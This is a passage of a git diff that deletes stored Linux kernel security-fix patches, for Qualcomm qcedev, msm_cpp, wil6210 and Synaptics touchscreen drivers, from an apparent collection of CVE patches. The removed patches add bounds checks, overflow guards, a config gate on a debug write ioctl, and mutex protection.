- 	for (i = 0; i < qcedev_areq->sha_op_req.entries; i++) {
- 		user_src =
- 			(void __user *)qcedev_areq->sha_op_req.data[i].vaddr;
--		if (user_src && __copy_from_user(k_src, (void __user *)user_src,
-+		if (user_src && copy_from_user(k_src, (void __user *)user_src,
- 				qcedev_areq->sha_op_req.data[i].len)) {
- 			kzfree(k_buf_src);
- 			return -EFAULT;
-@@ -928,12 +909,7 @@ static int qcedev_set_hmac_auth_key(struct qcedev_async_req *areq,
- 
- 	if (areq->sha_op_req.authklen <= QCEDEV_MAX_KEY_SIZE) {
- 		qcedev_sha_init(areq, handle);
--		/* Verify Source Address */
--		if (!access_ok(VERIFY_READ,
--				(void __user *)areq->sha_op_req.authkey,
--				areq->sha_op_req.authklen))
--			return -EFAULT;
--		if (__copy_from_user(&handle->sha_ctxt.authkey[0],
-+		if (copy_from_user(&handle->sha_ctxt.authkey[0],
- 				(void __user *)areq->sha_op_req.authkey,
- 				areq->sha_op_req.authklen))
- 			return -EFAULT;
-@@ -1146,7 +1122,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq,
- 		byteoffset = areq->cipher_op_req.byteoffset;
- 
- 	user_src = (void __user *)areq->cipher_op_req.vbuf.src[0].vaddr;
--	if (user_src && __copy_from_user((k_align_src + byteoffset),
-+	if (user_src && copy_from_user((k_align_src + byteoffset),
- 				(void __user *)user_src,
- 				areq->cipher_op_req.vbuf.src[0].len))
- 		return -EFAULT;
-@@ -1156,7 +1132,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq,
- 	for (i = 1; i < areq->cipher_op_req.entries; i++) {
- 		user_src =
- 			(void __user *)areq->cipher_op_req.vbuf.src[i].vaddr;
--		if (user_src && __copy_from_user(k_align_src,
-+		if (user_src && copy_from_user(k_align_src,
- 					(void __user *)user_src,
- 					areq->cipher_op_req.vbuf.src[i].len)) {
- 			return -EFAULT;
-@@ -1188,7 +1164,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq,
- 
- 	while (creq->data_len > 0) {
- 		if (creq->vbuf.dst[dst_i].len <= creq->data_len) {
--			if (err == 0 && __copy_to_user(
-+			if (err == 0 && copy_to_user(
- 				(void __user *)creq->vbuf.dst[dst_i].vaddr,
- 					(k_align_dst + byteoffset),
- 					creq->vbuf.dst[dst_i].len))
-@@ -1199,7 +1175,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq,
- 			creq->data_len -= creq->vbuf.dst[dst_i].len;
- 			dst_i++;
- 		} else {
--				if (err == 0 && __copy_to_user(
-+				if (err == 0 && copy_to_user(
- 				(void __user *)creq->vbuf.dst[dst_i].vaddr,
- 				(k_align_dst + byteoffset),
- 				creq->data_len))
-@@ -1531,36 +1507,6 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 			__func__, total, req->data_len);
- 		goto error;
- 	}
--	/* Verify Source Address's */
--	for (i = 0, total = 0; i < req->entries; i++) {
--		if (total < req->data_len) {
--			if (!access_ok(VERIFY_READ,
--				(void __user *)req->vbuf.src[i].vaddr,
--					req->vbuf.src[i].len)) {
--					pr_err("%s:SRC RD_VERIFY err %d=0x%lx\n",
--						__func__, i, (uintptr_t)
--							req->vbuf.src[i].vaddr);
--					goto error;
--			}
--			total += req->vbuf.src[i].len;
--		}
--	}
--
--	/* Verify Destination Address's */
--	for (i = 0, total = 0; i < QCEDEV_MAX_BUFFERS; i++) {
--		if ((req->vbuf.dst[i].vaddr != 0) &&
--			(total < req->data_len)) {
--			if (!access_ok(VERIFY_WRITE,
--				(void __user *)req->vbuf.dst[i].vaddr,
--					req->vbuf.dst[i].len)) {
--					pr_err("%s:DST WR_VERIFY err %d=0x%lx\n",
--						__func__, i, (uintptr_t)
--							req->vbuf.dst[i].vaddr);
--					goto error;
--			}
--			total += req->vbuf.dst[i].len;
--		}
--	}
- 	return 0;
- error:
- 	return -EINVAL;
-@@ -1656,11 +1602,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 	switch (cmd) {
- 	case QCEDEV_IOCTL_ENC_REQ:
- 	case QCEDEV_IOCTL_DEC_REQ:
--		if (!access_ok(VERIFY_WRITE, (void __user *)arg,
--				sizeof(struct qcedev_cipher_op_req)))
--			return -EFAULT;
--
--		if (__copy_from_user(&qcedev_areq.cipher_op_req,
-+		if (copy_from_user(&qcedev_areq.cipher_op_req,
- 				(void __user *)arg,
- 				sizeof(struct qcedev_cipher_op_req)))
- 			return -EFAULT;
-@@ -1673,20 +1615,17 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		err = qcedev_vbuf_ablk_cipher(&qcedev_areq, handle);
- 		if (err)
- 			return err;
--		if (__copy_to_user((void __user *)arg,
-+		if (copy_to_user((void __user *)arg,
- 					&qcedev_areq.cipher_op_req,
- 					sizeof(struct qcedev_cipher_op_req)))
--				return -EFAULT;
-+			return -EFAULT;
- 		break;
- 
- 	case QCEDEV_IOCTL_SHA_INIT_REQ:
- 		{
- 		struct scatterlist sg_src;
--		if (!access_ok(VERIFY_WRITE, (void __user *)arg,
--				sizeof(struct qcedev_sha_op_req)))
--			return -EFAULT;
- 
--		if (__copy_from_user(&qcedev_areq.sha_op_req,
-+		if (copy_from_user(&qcedev_areq.sha_op_req,
- 					(void __user *)arg,
- 					sizeof(struct qcedev_sha_op_req)))
- 			return -EFAULT;
-@@ -1696,9 +1635,9 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		err = qcedev_hash_init(&qcedev_areq, handle, &sg_src);
- 		if (err)
- 			return err;
--		if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
-+		if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
- 					sizeof(struct qcedev_sha_op_req)))
--				return -EFAULT;
-+			return -EFAULT;
- 		}
- 		handle->sha_ctxt.init_done = true;
- 		break;
-@@ -1708,11 +1647,8 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 	case QCEDEV_IOCTL_SHA_UPDATE_REQ:
- 		{
- 		struct scatterlist sg_src;
--		if (!access_ok(VERIFY_WRITE, (void __user *)arg,
--				sizeof(struct qcedev_sha_op_req)))
--			return -EFAULT;
- 
--		if (__copy_from_user(&qcedev_areq.sha_op_req,
-+		if (copy_from_user(&qcedev_areq.sha_op_req,
- 					(void __user *)arg,
- 					sizeof(struct qcedev_sha_op_req)))
- 			return -EFAULT;
-@@ -1734,10 +1670,15 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 				return err;
- 		}
- 
-+		if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) {
-+			pr_err("Invalid sha_ctxt.diglen %d\n",
-+					handle->sha_ctxt.diglen);
-+			return -EINVAL;
-+		}
- 		memcpy(&qcedev_areq.sha_op_req.digest[0],
- 				&handle->sha_ctxt.digest[0],
- 				handle->sha_ctxt.diglen);
--		if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
-+		if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
- 					sizeof(struct qcedev_sha_op_req)))
- 			return -EFAULT;
- 		}
-@@ -1749,11 +1690,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			pr_err("%s Init was not called\n", __func__);
- 			return -EINVAL;
- 		}
--		if (!access_ok(VERIFY_WRITE, (void __user *)arg,
--				sizeof(struct qcedev_sha_op_req)))
--			return -EFAULT;
--
--		if (__copy_from_user(&qcedev_areq.sha_op_req,
-+		if (copy_from_user(&qcedev_areq.sha_op_req,
- 					(void __user *)arg,
- 					sizeof(struct qcedev_sha_op_req)))
- 			return -EFAULT;
-@@ -1767,7 +1704,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		memcpy(&qcedev_areq.sha_op_req.digest[0],
- 				&handle->sha_ctxt.digest[0],
- 				handle->sha_ctxt.diglen);
--		if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
-+		if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
- 					sizeof(struct qcedev_sha_op_req)))
- 			return -EFAULT;
- 		handle->sha_ctxt.init_done = false;
-@@ -1776,11 +1713,8 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 	case QCEDEV_IOCTL_GET_SHA_REQ:
- 		{
- 		struct scatterlist sg_src;
--		if (!access_ok(VERIFY_WRITE, (void __user *)arg,
--				sizeof(struct qcedev_sha_op_req)))
--			return -EFAULT;
- 
--		if (__copy_from_user(&qcedev_areq.sha_op_req,
-+		if (copy_from_user(&qcedev_areq.sha_op_req,
- 					(void __user *)arg,
- 					sizeof(struct qcedev_sha_op_req)))
- 			return -EFAULT;
-@@ -1798,7 +1732,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		memcpy(&qcedev_areq.sha_op_req.digest[0],
- 				&handle->sha_ctxt.digest[0],
- 				handle->sha_ctxt.diglen);
--		if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
-+		if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req,
- 					sizeof(struct qcedev_sha_op_req)))
- 			return -EFAULT;
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0521/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0521/3.18/0001.patch
deleted file mode 100644
index 21f4cc92..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0521/3.18/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From dbe4f26f200db10deaf38676b96d8738afcc10c8 Mon Sep 17 00:00:00 2001
-From: Kumar Behera <mohanb@codeaurora.org>
-Date: Fri, 9 Dec 2016 09:55:00 -0800
-Subject: msm: cpp: Fix for integer overflow in cpp
-
-Due to integer overflow ,the bound check in config frame function
-may pass and this may allow user to access invalid buffer. This
-fix takes care of proper bound and don't allow integer overflow.
-
-CRs-Fxied: 1097709
-Change-Id: I504ad591633afaba82268b5ee27a321691d75c80
-Signed-off-by: Kumar Behera <mohanb@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index f64f79b..e81a9f9 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2376,7 +2376,7 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 	struct msm_buf_mngr_info buff_mgr_info, dup_buff_mgr_info;
- 	int32_t in_fd;
- 	int32_t num_output_bufs = 1;
--	int32_t stripe_base = 0;
-+	uint32_t stripe_base = 0;
- 	uint32_t stripe_size;
- 	uint8_t tnr_enabled;
- 	enum msm_camera_buf_mngr_buf_type buf_type =
-@@ -2411,6 +2411,13 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 		return -EINVAL;
- 	}
- 
-+	if (stripe_base == UINT_MAX || new_frame->num_strips >
-+		(UINT_MAX - 1 - stripe_base) / stripe_size) {
-+		pr_err("Invalid frame message,num_strips %d is large\n",
-+			new_frame->num_strips);
-+		return -EINVAL;
-+	}
-+
- 	if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
- 		new_frame->msg_len) {
- 		pr_err("Invalid frame message,len=%d,expected=%d\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0521/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0521/4.4/0002.patch
deleted file mode 100644
index 6171f882..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0521/4.4/0002.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From 77c4aba67d89ba4055b7c9bd417f49593cba497b Mon Sep 17 00:00:00 2001
-From: Kumar Behera <mohanb@codeaurora.org>
-Date: Fri, 9 Dec 2016 09:55:00 -0800
-Subject: msm: cpp: Fix for integer overflow in cpp
-
-Due to integer overflow ,the bound check in config frame function
-may pass and this may allow user to access invalid buffer. This
-fix takes care of proper bound and don't allow integer overflow.
-
-CRs-Fxied: 1097709
-Change-Id: I504ad591633afaba82268b5ee27a321691d75c80
-Signed-off-by: Kumar Behera <mohanb@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index b7724b4..5be2748 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2479,7 +2479,7 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 	struct msm_buf_mngr_info buff_mgr_info, dup_buff_mgr_info;
- 	int32_t in_fd;
- 	int32_t num_output_bufs = 1;
--	int32_t stripe_base = 0;
-+	uint32_t stripe_base = 0;
- 	uint32_t stripe_size;
- 	uint8_t tnr_enabled;
- 	enum msm_camera_buf_mngr_buf_type buf_type =
-@@ -2514,6 +2514,13 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 		return -EINVAL;
- 	}
- 
-+	if (stripe_base == UINT_MAX || new_frame->num_strips >
-+		(UINT_MAX - 1 - stripe_base) / stripe_size) {
-+		pr_err("Invalid frame message,num_strips %d is large\n",
-+			new_frame->num_strips);
-+		return -EINVAL;
-+	}
-+
- 	if ((stripe_base + new_frame->num_strips * stripe_size + 1) !=
- 		new_frame->msg_len) {
- 		pr_err("Invalid frame message,len=%d,expected=%d\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0523/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0523/3.18/0001.patch
deleted file mode 100644
index cbd30c4a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0523/3.18/0001.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From 5bb646471da76d3d5cd02cf3da7a03ce6e3cb582 Mon Sep 17 00:00:00 2001
-From: Hamad Kadmany <hkadmany@codeaurora.org>
-Date: Sun, 18 Dec 2016 15:03:11 +0200
-Subject: wil6210: Block write ioctl to the card by default
-
-The ability to write to the card is used for debug purposes.
-The ability is disabled by default to prevent misuse of
-this functionality.
-
-CRs-Fixed: 1096945
-Change-Id: I8fc3f646a0127ec705239be6a7de858a4f805acc
-Signed-off-by: Hamad Kadmany <hkadmany@codeaurora.org>
----
- drivers/net/wireless/ath/wil6210/Kconfig | 11 +++++++++++
- drivers/net/wireless/ath/wil6210/ioctl.c |  4 ++++
- 2 files changed, 15 insertions(+)
-
-diff --git a/drivers/net/wireless/ath/wil6210/Kconfig b/drivers/net/wireless/ath/wil6210/Kconfig
-index 481680a..eaa5a9d 100644
---- a/drivers/net/wireless/ath/wil6210/Kconfig
-+++ b/drivers/net/wireless/ath/wil6210/Kconfig
-@@ -40,6 +40,17 @@ config WIL6210_TRACING
- 
- 	  If unsure, say Y to make it easier to debug problems.
- 
-+config WIL6210_WRITE_IOCTL
-+	bool "wil6210 write ioctl to the device"
-+	depends on WIL6210
-+	default n
-+	---help---
-+	  Say Y here to allow write-access from user-space to
-+	  the device memory through ioctl. This is useful for
-+	  debugging purposes only.
-+
-+	  If unsure, say N.
-+
- config WIL6210_PLATFORM_MSM
- 	bool "wil6210 MSM platform specific support"
- 	depends on WIL6210
-diff --git a/drivers/net/wireless/ath/wil6210/ioctl.c b/drivers/net/wireless/ath/wil6210/ioctl.c
-index e9c0673..f5ad473 100644
---- a/drivers/net/wireless/ath/wil6210/ioctl.c
-+++ b/drivers/net/wireless/ath/wil6210/ioctl.c
-@@ -79,10 +79,12 @@ static int wil_ioc_memio_dword(struct wil6210_priv *wil, void __user *data)
- 		io.val = ioread32(a);
- 		need_copy = true;
- 		break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- 	case wil_mmio_write:
- 		iowrite32(io.val, a);
- 		wmb(); /* make sure write propagated to HW */
- 		break;
-+#endif
- 	default:
- 		wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- 		return -EINVAL;
-@@ -139,6 +141,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- 			goto out_free;
- 		}
- 		break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- 	case wil_mmio_write:
- 		if (copy_from_user(block, io.block, io.size)) {
- 			rc = -EFAULT;
-@@ -148,6 +151,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- 		wmb(); /* make sure write propagated to HW */
- 		wil_hex_dump_ioctl("Write ", block, io.size);
- 		break;
-+#endif
- 	default:
- 		wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- 		rc = -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0523/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0523/4.4/0002.patch
deleted file mode 100644
index 3c107112..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0523/4.4/0002.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From 2c7b4349b858398caf0ae146e87554c3502d20a5 Mon Sep 17 00:00:00 2001
-From: Hamad Kadmany <hkadmany@codeaurora.org>
-Date: Sun, 18 Dec 2016 15:03:11 +0200
-Subject: wil6210: Block write ioctl to the card by default
-
-The ability to write to the card is used for debug purposes.
-The ability is disabled by default to prevent misuse of
-this functionality.
-
-CRs-Fixed: 1096945
-Change-Id: I8fc3f646a0127ec705239be6a7de858a4f805acc
-Signed-off-by: Hamad Kadmany <hkadmany@codeaurora.org>
----
- drivers/net/wireless/ath/wil6210/Kconfig | 11 +++++++++++
- drivers/net/wireless/ath/wil6210/ioctl.c |  4 ++++
- 2 files changed, 15 insertions(+)
-
-diff --git a/drivers/net/wireless/ath/wil6210/Kconfig b/drivers/net/wireless/ath/wil6210/Kconfig
-index 9e3961c..8f0bde5 100644
---- a/drivers/net/wireless/ath/wil6210/Kconfig
-+++ b/drivers/net/wireless/ath/wil6210/Kconfig
-@@ -41,6 +41,17 @@ config WIL6210_TRACING
- 
- 	  If unsure, say Y to make it easier to debug problems.
- 
-+config WIL6210_WRITE_IOCTL
-+	bool "wil6210 write ioctl to the device"
-+	depends on WIL6210
-+	default n
-+	---help---
-+	  Say Y here to allow write-access from user-space to
-+	  the device memory through ioctl. This is useful for
-+	  debugging purposes only.
-+
-+	  If unsure, say N.
-+
- config WIL6210_PLATFORM_MSM
- 	bool "wil6210 MSM platform specific support"
- 	depends on WIL6210
-diff --git a/drivers/net/wireless/ath/wil6210/ioctl.c b/drivers/net/wireless/ath/wil6210/ioctl.c
-index 47058ccc..bbdd232 100644
---- a/drivers/net/wireless/ath/wil6210/ioctl.c
-+++ b/drivers/net/wireless/ath/wil6210/ioctl.c
-@@ -87,10 +87,12 @@ static int wil_ioc_memio_dword(struct wil6210_priv *wil, void __user *data)
- 		io.val = readl(a);
- 		need_copy = true;
- 		break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- 	case wil_mmio_write:
- 		writel(io.val, a);
- 		wmb(); /* make sure write propagated to HW */
- 		break;
-+#endif
- 	default:
- 		wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- 		return -EINVAL;
-@@ -147,6 +149,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- 			goto out_free;
- 		}
- 		break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- 	case wil_mmio_write:
- 		if (copy_from_user(block, io.block, io.size)) {
- 			rc = -EFAULT;
-@@ -156,6 +159,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- 		wmb(); /* make sure write propagated to HW */
- 		wil_hex_dump_ioctl("Write ", block, io.size);
- 		break;
-+#endif
- 	default:
- 		wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- 		rc = -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0524/ANY/0001.patch
deleted file mode 100644
index e4a248b6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0001.patch
+++ /dev/null
@@ -1,118 +0,0 @@
-From e1fb1600fc222337989e3084d68df929882deae5 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Tue, 17 Jan 2017 07:37:52 -0800
-Subject: [PATCH] input: synaptics: put offset checks under mutex.
-
-Place file offset validity checks under mutex.
-
-BUG: 33555878
-BUG: 33002026
-
-Change-Id: I1945cfc8af7d1a310ae0d7bbb85002d4c448f30b
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/synaptics_rmi_dev.c | 52 ++++++++++++++++++---------
- 1 file changed, 36 insertions(+), 16 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_rmi_dev.c b/drivers/input/touchscreen/synaptics_rmi_dev.c
-index e2d7c27eb6832..e7c19d00c0544 100644
---- a/drivers/input/touchscreen/synaptics_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_rmi_dev.c
-@@ -299,18 +299,26 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
-+	mutex_lock(&(dev_data->file_mutex));
- 
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
--	tmpbuf = kzalloc(count + 1, GFP_KERNEL);
--	if (!tmpbuf)
--		return -ENOMEM;
-+	if (count == 0) {
-+		retval = 0;
-+		goto unlock;
-+	}
- 
--	mutex_lock(&(dev_data->file_mutex));
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 
-+	tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-+	if (!tmpbuf) {
-+		retval = -ENOMEM;
-+		goto unlock;
-+	}
- 	retval = rmidev->fn_ptr->read(rmidev->rmi4_data,
- 			*f_pos,
- 			tmpbuf,
-@@ -324,9 +332,10 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 		*f_pos += retval;
- 
- clean_up:
-+	kfree(tmpbuf);
-+unlock:
- 	mutex_unlock(&(dev_data->file_mutex));
- 
--	kfree(tmpbuf);
- 	return retval;
- }
- 
-@@ -350,23 +359,32 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
-+	mutex_lock(&(dev_data->file_mutex));
-+
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
-+	if (count == 0) {
-+		retval = 0;
-+		goto unlock;
-+	}
-+
- 	tmpbuf = kzalloc(count + 1, GFP_KERNEL);
--	if (!tmpbuf)
--		return -ENOMEM;
-+	if (!tmpbuf) {
-+		retval = -ENOMEM;
-+		goto unlock;
-+	}
- 
- 	if (copy_from_user(tmpbuf, buf, count)) {
--		kfree(tmpbuf);
--		return -EFAULT;
-+		retval = -EFAULT;
-+		goto clean_up;
- 	}
- 
--	mutex_lock(&(dev_data->file_mutex));
--
- 	retval = rmidev->fn_ptr->write(rmidev->rmi4_data,
- 			*f_pos,
- 			tmpbuf,
-@@ -374,8 +392,10 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 	if (retval >= 0)
- 		*f_pos += retval;
- 
--	mutex_unlock(&(dev_data->file_mutex));
-+clean_up:
- 	kfree(tmpbuf);
-+unlock:
-+	mutex_unlock(&(dev_data->file_mutex));
- 	return retval;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0524/ANY/0002.patch
deleted file mode 100644
index e4a087c5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0002.patch
+++ /dev/null
@@ -1,85 +0,0 @@
-From 0ab30d91fb178c5967753343029581983a4e9b67 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Fri, 13 Jan 2017 13:33:57 -0800
-Subject: [PATCH] input: synaptics_dsx: protect tmpbuf allocation.
-
-Protect tmpbuf from concurrent access by mutex.
-
-BUG: 33555878
-BUG: 33002026
-Change-Id: Ia986a34647d5825946594ea17a5cd6fa0abb115f
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx25/synaptics_dsx_rmi_dev.c        | 33 +++++++++++++++-------
- 1 file changed, 23 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c
-index 87abf86cdc6b4..018c621c0cfeb 100644
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c
-@@ -483,16 +483,21 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
-+	mutex_lock(&(dev_data->file_mutex));
- 
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto clean_up;
-+	}
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
-+	if (count == 0) {
-+		retval = 0;
-+		goto clean_up;
-+	}
- 
- 	rmidev_allocate_buffer(count);
- 
--	mutex_lock(&(dev_data->file_mutex));
--
- 	retval = synaptics_rmi4_reg_read(rmidev->rmi4_data,
- 			*f_pos,
- 			rmidev->tmpbuf,
-@@ -530,18 +535,25 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
-+	mutex_lock(&(dev_data->file_mutex));
- 
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
-+	if (count == 0) {
-+		retval = 0;
-+		goto unlock;
-+	}
- 
- 	rmidev_allocate_buffer(count);
- 
--	if (copy_from_user(rmidev->tmpbuf, buf, count))
--		return -EFAULT;
--
--	mutex_lock(&(dev_data->file_mutex));
-+	if (copy_from_user(rmidev->tmpbuf, buf, count)) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 
- 	retval = synaptics_rmi4_reg_write(rmidev->rmi4_data,
- 			*f_pos,
-@@ -550,6 +562,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 	if (retval >= 0)
- 		*f_pos += retval;
- 
-+unlock:
- 	mutex_unlock(&(dev_data->file_mutex));
- 
- 	return retval;
diff --git a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-0524/ANY/0003.patch
deleted file mode 100644
index 24e8b2ed..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0003.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From e6430a4da1fb0212a546379eadbe986f629c3ae9 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Fri, 13 Jan 2017 11:41:03 -0800
-Subject: [PATCH] input: synaptics_dsx: protect tmpbuf allocation.
-
-Protect tmpbuf from concurrent access by mutex.
-
-BUG: 33555878
-BUG: 33002026
-Change-Id: Ia7eeb59ca7b626f416e2298b4b9ffd960fe909e4
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c  | 36 ++++++++++++++--------
- 1 file changed, 24 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-index e699dfea50c81..6878b71da9be0 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-@@ -565,18 +565,24 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
-+	mutex_lock(&(dev_data->file_mutex));
-+
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto clean_up;
-+	}
- 
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
-+	if (count == 0) {
-+		retval = 0;
-+		goto clean_up;
-+	}
- 	address = (unsigned short)(*f_pos);
- 
- 	rmidev_allocate_buffer(count);
- 
--	mutex_lock(&(dev_data->file_mutex));
--
- 	retval = synaptics_rmi4_reg_read(rmidev->rmi4_data,
- 			*f_pos,
- 			rmidev->tmpbuf,
-@@ -636,19 +642,25 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
